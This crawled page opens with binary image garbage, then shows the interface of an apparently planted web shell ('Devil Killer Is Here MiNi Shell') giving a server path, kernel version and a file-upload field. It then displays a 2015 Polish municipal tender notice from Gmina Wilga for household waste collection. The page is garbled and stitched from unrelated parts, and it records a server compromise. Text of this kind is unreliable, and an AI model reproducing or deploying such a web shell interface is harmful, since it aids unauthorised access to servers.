JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151202/326650-N-2015.html

<p class="kh_header"><b>Wilga: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie Gminy Wilga.</b><br>
<b>Numer ogłoszenia: 326650 - 2015; data zamieszczenia: 02.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Wildze , ul. Warszawska 38, 08-470 Wilga, woj. mazowieckie, tel. 025 6853070, faks 025 6853071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.e-bip.pl Wilga gmina wiejska</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie Gminy Wilga..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa odbioru, transportu i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy na terenie Gminy Wilga. 
Na terenie gminy Wilga będą zbierane odpady komunalne zmieszane i selektywnie posegregowane w  systemie pojemnikowo - workowym. 
Gmina Wilga w ramach systemu nie przewiduje odbierania odpadów  wytworzonych w ramach prowadzenia działalności gospodarczej. 
Usługa obejmuje również zapewnienie przez Wykonawcę dojazdu do punktów trudno dostępnych - drogi leśne, drogi gruntowe -  poprzez zorganizowanie odpowiednich środków transportu, które umożliwią odbiór odpadów z punktów adresowych o problematycznej lokalizacji. 

Charakterystyka Gminy Wilga 
Powierzchnia gminy wynosi 119 km2 
Liczba mieszkańców na terenie Gminy Wilga wg Ewidencji Ludności wynosi 5236 osób (stan na 26.11.2015 r.).
Szacunkowa liczba gospodarstw ( punktów odbioru ) przewidywana do realizacji: 1865 szt.
Liczba gospodarstw domowych jest szacunkowa i może ulec w trakcie obowiązywania przedmiotu umowy.
Na terenie Gminy znajdują się następujące obręby geodezyjne: 
- Celejów - obręb geodezyjny - 001;
- Cyganówka - obręb geodezyjny - 002;
- Goźlin Górny - obręb geodezyjny - 003 ;
- Goźlin Mały -obręb geodezyjny - 004;
- Mariańskie Porzecze - obręb geodezyjny - 005;
- Nieciecz- obręb geodezyjny - 006;
- Nowe Podole - obręb geodezyjny - 007;
- Nowy Żabieniec - obręb geodezyjny - 008;
- Ostrybór - obręb geodezyjny - 009;
- Wilga Osiedle Turystyczno Wypoczynkowe - obręb geodezyjny - 0010;
- Ruda Tarnowska - obręb geodezyjny -0011;
- Skurcza - obręb geodezyjny -0012;
- Stare Podole - obręb geodezyjny -0013;
- Stary Żabieniec - obręb geodezyjny -0014;
- Tarnów - obręb geodezyjny - 0015;
- Trzcianka - obręb geodezyjny - 0016;
- Uścieniec Kolonia - obręb geodezyjny - 0017;
- Wicie - obręb geodezyjny - 0018;
- Wilga - obręb geodezyjny - 0019;
- Wólka Gruszczyńska - obręb geodezyjny - 0020;
- Holendry - obręb geodezyjny - 0020 - Wólka Gruszczyńska;
- Zakrzew - obręb geodezyjny - 0021;

Ilość odpadów komunalnych odebranych w latach 2013-2014 i pierwsze półrocze 2015 r. 
z terenu Gminy Wilga (informacje podane w powyższej tabeli pochodzą z informacji 
przekazywanych przez firmy świadczące usługi w zakresie odbioru odpadów 
komunalnych)


Lp.	Rodzaj odpadu	                                    Ilość [Mg]
		                                      2013 r.	     2014 r.	I półrocze
                                                                                   2015 r.
1.	Zmieszane 	                               349,00	265,80	147,50
2.	Odpady ulegające biodegradacji 	38,30	         81,20	37,20
3.	Tworzywa sztuczne 	                39,50	        69,90	        26,80
4.	Szkło                                  	87,60	        60,20	        19,40
5.	Papier i tektura 	                        52,30	        69,70	        22,30
6.	Metal	                                          0,30	          1,60	          0,40
7.	Inne odpady pozostałe
( np. wielkogabaryty, zużyte opony, opakowania wielomateriałowe, metal, odpady rozbiórkowe, budowlane itp.)	                103,70	113,10	64,20
8. 	Razem	                                670,70	661,50	317,80

Podane wyżej ilości odpadów należy traktować jako orientacyjne i Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia i lub odszkodowania za osiągnięcie innych wielkości.

Wymogi dotyczące przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetworzenia odpadów komunalnych;
Gmina Wilga zgodnie z WPGO dla Mazowsza na lata 2012-2017 znajduje się w regionie ostrołęcko- siedleckim. Podmiot  realizujący zadania w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości przekazuje wyselekcjonowane strumienie odpadów w pierwszej kolejności do regionalnych instalacji do przetwarzania odpadów komunalnych (RIPOK), a w przypadku ich braku, do instalacji zastępczych wyznaczonych dla regionu, zgodnie z zasadą bliskości. Jeżeli dla regionu wyznaczono instalacje zastępcze poza regionem, to odpady mogą zostać do nich skierowane tylko i wyłącznie w przypadku braku wolnych mocy przerobowych instalacji regionalnych i zastępczych położonych w ramach regionu. Regionalne i zastępcze instalacje są określane w uchwale w sprawie wykonania WPGO dla Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018-2023 z późn. zm.. 
Zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania, przeznaczone do składowania, należy przekazać do regionalnej instalacji przetwarzana odpadów komunalnych zgodnie z ww. uchwałą oraz zmianami uchwały.

Podmioty odbierające odpady komunalne muszą stosować się do uchwalonego Regulaminu utrzymania czystości i porządku na terenie Gminy Wilga przyjętego Uchwałą Rady Gminy Wilga Nr  XI/62/15  z dnia 28 października 2015 r. i Uchwały Rady Gminy w Wildze Nr XI/63/15 z dnia 28.10.2015 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na których zamieszkują mieszkańcy i zagospodarowania tych odpadów.

Wykonawca jest odpowiedzialny za osiąganie poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r., poz. 1399 ze zm.), Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645 ) oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.  U. z 2012 r., poz. 676 ).

Zasady odbioru i zagospodarowania odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Wilga oraz z Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK).

1. Od właścicieli bezpośrednio sprzed posesji będzie odbierana każda zebrana przez właściciela 
nieruchomości ilość odpadów komunalnych:
1) niesegregowane (zmieszane) odpady komunalne;
2) papier i tektura;
	3) tworzywa sztuczne, metal i opakowania wielomateriałowe,
	4) szkło.
2. Pozostałe odpady komunalne z nieruchomości przekazywane będą w następujący sposób:
1) meble i inne odpady wielkogabarytowe, zużyte opony, zużyte baterie i akumulatory, zużyty sprzęt elektryczny i elektroniczny, odpady budowlane i rozbiórkowe, należy przekazywać przez mieszkańców do PSZOK;	
2) przeterminowane leki należy przekazywać do PSZOK lub umieszczać w przeznaczonych do tego celu i specjalnie oznakowanych pojemnikach, znajdujących się na terenie apteki w Wildze, ul. Wojska Polskiego 8, 08-470 Wilga,
3) chemikalia (w szczególności farby, lakiery, środki ochrony roślin), papę oraz styropian należy przekazywać przez mieszkańców do PSZOK,
4) odpady komunalne ulegające biodegradacji, w tym odpady zielone oraz popiół, zgromadzone bezpośrednio na nieruchomości, na której powstały, mogą być przekazywane w pojemnikach lub workach przez mieszkańców do PSZOK.
Wykonawca zobowiązany jest do wyposażenia Punktu Selektywnego Zbierania Odpadów Komunalnych w odpowiednie pojemniki na w/w odpady. 
3. Punkt selektywnego zbierania odpadów komunalnych (dalej PSZOK) zlokalizowany będzie na terenie przy gminnej oczyszczalni ścieków w Celejowie. 
PSZOK będzie otwarty w określonym w harmonogramie dniu, z częstotliwością raz na kwartał w godz. 8:00  - 16:00. Wykonawca zapewni pracownika do obsługi PSZOK. 
W danym dniu Wykonawca zobowiązany jest podstawić pojemniki na poszczególne frakcje odpadów dostosowane do ilości odpadów i pory roku oraz w tym dniu je odebrać. 
4. Wykonawca zobowiązany jest w ramach systemu, dostarczyć i wyposażyć nieruchomości zamieszkałe w worki na odpady zbierane w sposób selektywny o pojemności 120 l o ujednoliconych kolorach:
- żółty - tworzywa sztuczne, opakowania wielomateriałowe oraz metal;
- niebieski - papier i tektura;
- zielony - szkło. 
Worki muszą być wykonane z półprzezroczystej folii, umożliwiającej szybką ocenę ich zawartości, z nadrukiem jasno określającym, jakie rodzaje odpadów mogą być w nim gromadzone oraz nazwę Wykonawcy. Worki dostarczone do realizacji selektywnej zbiórki odpadów mają być wytrzymałe (plastyczne).
Wykonawca odbierając od mieszkańców worki wypełnione odpadami komunalnymi zebranymi w  sposób selektywny zgodnie z ustalonym harmonogramem zastępuje je nowymi na zasadzie worek  za worek.
Wykonawca będzie dostarczał worki do selektywnej zbiórki odpadów komunalnych, do siedziby   Urzędu Gminy Wilga w celu umożliwienia mieszkańcom pobierania dodatkowych worków. Worki będą zamawiane telefonicznie przez upoważnionego pracownika Urzędu Gminy Wilga.
5. Ustala się częstotliwość odbioru odpadów komunalnych, o których mowa w pkt 1 od właścicieli nieruchomości zamieszkałych: 
1) niesegregowane (zmieszane) odpady komunalne - z zabudowy jednorodzinnej oraz   wielorodzinnej - jeden raz w miesiącu,
2) segregowane odpady komunalne - z zabudowy jednorodzinnej oraz wielorodzinnej -  jeden raz w miesiącu.
6.  Wykonawca zobowiązany jest do realizacji reklamacji w ciągu 3 dni od otrzymania zgłoszenia od   Zamawiającego o nieodebraniu odpadów komunalnych od właścicieli nieruchomości, na których   zamieszkują mieszkańcy zgodnie z harmonogramem bądź nie pozostawieniu przez Wykonawcę worków na wymianę.
7. Wykonawca zobowiązany jest do objęcia systemem odbioru i zagospodarowania odpadów komunalnych wszystkich nowych nieruchomości, zgłaszanych przez Zamawiającego w trakcie realizacji umowy. 
8.  Wykonawca zobowiązany jest do przekazywania Zamawiającemu adresów nieruchomości zamieszkałych jeżeli nie są ujęte w bazie danych prowadzonej przez Zamawiającego w raporcie miesięcznym.
9. Wykonawca zobowiązany jest do utrzymania czystości i porządku w trakcie odbierania odpadów  komunalnych, a w szczególności Wykonawca zobowiązany jest do zbierania odpadów leżących obok pojemników, jeżeli jest to wynikiem normalnej działalności Wykonawcy lub wynikiem nierzetelnego wykonania usługi.
10. W dniu podpisania umowy Wykonawca otrzyma od Zamawiającego szczegółowy wykaz nieruchomości/punktów adresowych, z których będą odbierane odpady komunalne z podziałem nieruchomości na te, w których zadeklarowano zbieranie odpadów komunalnych w sposób selektywny oraz te nieruchomości, w których zadeklarowano zbieranie w sposób zmieszany.
11.  W trakcie realizacji umowy wykaz będzie na bieżąco aktualizowany (przez Zamawiającego i Wykonawcę).
12. Wykonawca zobowiązany jest sporządzić harmonogram odbioru odpadów (w formie papierowej i elektronicznej) na czas trwania umowy i przedstawić Zamawiającemu do akceptacji. 
13. Za wyrządzone szkody w majątku Zamawiającego lub osób trzecich w trakcie odbioru odpadów  odpowiedzialność ponosi Wykonawca.
14.  Do obowiązków Wykonawcy należy kontrolowanie właścicieli nieruchomości pod kątem  wypełniania obowiązku w zakresie selektywnego zbierania odpadów komunalnych oraz niezwłoczne informowanie Zamawiającego o przypadkach niedopełniania przez właścicieli nieruchomości w/w obowiązku. 
15. Wykonawca zobowiązany jest do przedkładania Zamawiającemu raportów miesięcznych, w formie uzgodnionej z Zamawiającym, zawierających informacje:
- o nowych nieruchomościach objętych systemem odbioru odpadów komunalnych,
- o ilości i rodzaju wydanych worków,
- o ilości i rodzaju odebranych odpadów zmieszanych i selektywnie zbieranych,
- wskazujące właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z Regulaminem oraz deklaracją o wysokości opłaty za gospodarowanie odpadami komunalnymi,
- o adresach nieruchomości zamieszkałych, a nie ujętych w bazie danych prowadzonej przez Zamawiającego.
16.	Wykonawca zobowiązany jest do przekazywania Zamawiającemu faktury za każdy miesiąc 
wykonanej usługi z kartami przekazania odpadów i raportem miesięcznym zawierającym wyszczególnienie miejsca odbioru odpadów oraz ilości i rodzaju odebranych odpadów (zgodnie z obowiązująca klasyfikacją odpadów), na których znajdować się winna adnotacja, że odpady pochodzą z terenu Gminy Wilga lub na dodatkowe żądanie Zamawiającego raport z systemu GPS zamontowanego w pojeździe przeznaczonym do zbierania odpadów dokumentującym przebieg pracy pojazdu na terenie. 
Rozliczenie finansowe z Wykonawcą następować będzie w systemie miesięcznym za dany miesiąc zrealizowanego odbioru i zagospodarowania ilości odpadów komunalnych objętych umową. Warunkiem płatności będzie prawidłowo wystawiona faktura VAT wraz z kartami przekazania odpadów komunalnych do miejsca ich zagospodarowania oraz raportu miesięcznego. Termin płatności - wskazany w ofercie - od daty otrzymania prawidłowej faktury VAT.
17.	Wykonawca zobowiązany jest do przedkładania Zamawiającemu najpóźniej wraz z fakturą 
kart przekazania odpadów do RIPOK-ów oraz  innych jednostek do odbioru odpadów selektywnie zebranych zgodnie z obowiązującymi wzorami, o jakich mowa w rozporządzeniu Ministra Środowiska z 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów oraz w rozporządzeniu Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzania i przekazywania zbiorczych zestawień danych o odpadach.
18. Wykonawca  zobowiązany jest do dostarczania Zamawiającemu w wersji papierowej i 
elektronicznej sprawozdań półrocznych o jakich mowa w art. 9 n ustawy o Utrzymaniu czystości i porządku w gminach. Sprawozdania powinny być sporządzone zgodnie z rozporządzeniem Ministra Środowiska z 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach   komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami, a w przypadku zmiany rozporządzenia, zgodnie z obowiązującymi wzorami druków.
19. W celu umożliwienia sporządzenia przez Zamawiającego rocznego sprawozdania z realizacji 
zadań z zakresu gospodarowania odpadami komunalnymi, o którym mowa w art. 9q ustawy,   
Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje umożliwiające sporządzenie sprawozdania. Wykonawca zobowiązany będzie również do przedkładania Zamawiającemu innych informacji nt. odbioru, unieszkodliwiania i segregacji odpadów jeśli w trakcie realizacji zamówienia na Zamawiającego nałożony zostanie obowiązek sporządzania  innych sprawozdań z zakresu gospodarki odpadami. Dotyczy to tylko informacji w posiadaniu,  których będzie Wykonawca a nie Zamawiający..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z art. 67 ust. 1 pkt. 6.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Oferta musi być zabezpieczona wadium w wysokości 8 000,00 zł (słownie: osiem tysięcy złotych).
Wadium musi obejmować okres związania ofertą, tj. 30 dni. 
Termin wniesienia wadium upływa dnia  11.12.2015 r. do godz. 10 00.
2.  Zamawiający  zatrzymuje  wadium wraz z odsetkami, jeżeli Wykonawca  w  odpowiedzi  na  wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa   nie  uzupełnił  dokumentów  lub  oświadczeń, o których mowa w art. 25ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
3.  Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana.
Wadium Wykonawcy, który wygra przetarg zostanie zwrócone z chwilą podpisania umowy i wniesienia zabezpieczenia należytego wykonania umowy.
4.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
          - odmówił podpisania umowy na warunkach określonych w ofercie,
          - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
          - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
5.  Formy i miejsce wniesienia wadium
Wykonawca winien wnieść wadium przetargowe najpóźniej do dnia i godziny złożenia oferty. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm..).
6.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 
Bank Spółdzielczy Garwolin Nr 90 9210 0008 0046 7021 2000 0050, z dopiskiem Wadium na
Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie Gminy Wilga.
Wadium wnoszone w pieniądzu zamawiający przechowuje na rachunku bankowym.
7.  W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące
utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku wykonawca powinien posiadać wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Wilga prowadzonego przez Wójta Gminy Wilga i składa oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp - załącznik nr 2 do SIWZ .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca składa wykaz usług zawierający wykonanie w okresie ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwóch zamówień w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wykonywanych w sposób ciągły przez okres min. 12 miesięcy o masie min. 550 Mg dla każdego zamówienia, z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca będzie dysponował bazą magazynowo - transportową usytuowaną na terenie Gminy Wilga  lub w odległości nie większej niż 60 km od granic tej gminy.. Baza powinna być usytuowana na terenie, do którego Wykonawca posiada tytuł prawny. Na terenie bazy muszą być zabezpieczone miejsca do magazynowania selektywnie zebranych odpadów komunalnych, które będą zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych. 
Na terenie bazy muszą znajdować się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania. 
Spełnienie wymagań nastąpi poprzez opisanie zawierającego powyższe wymagania z podaniem dokładnej lokalizacji wraz z informacją o jej powierzchni i formie dysponowania i podpisanie oświadczenia: Wykaz potencjału technicznego - załącznik nr  5 do SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni spełniać ww. warunek w sposób następujący : przynajmniej jeden z wykonawców musi spełnić ten warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu spełniania tego warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp.  - załącznik nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

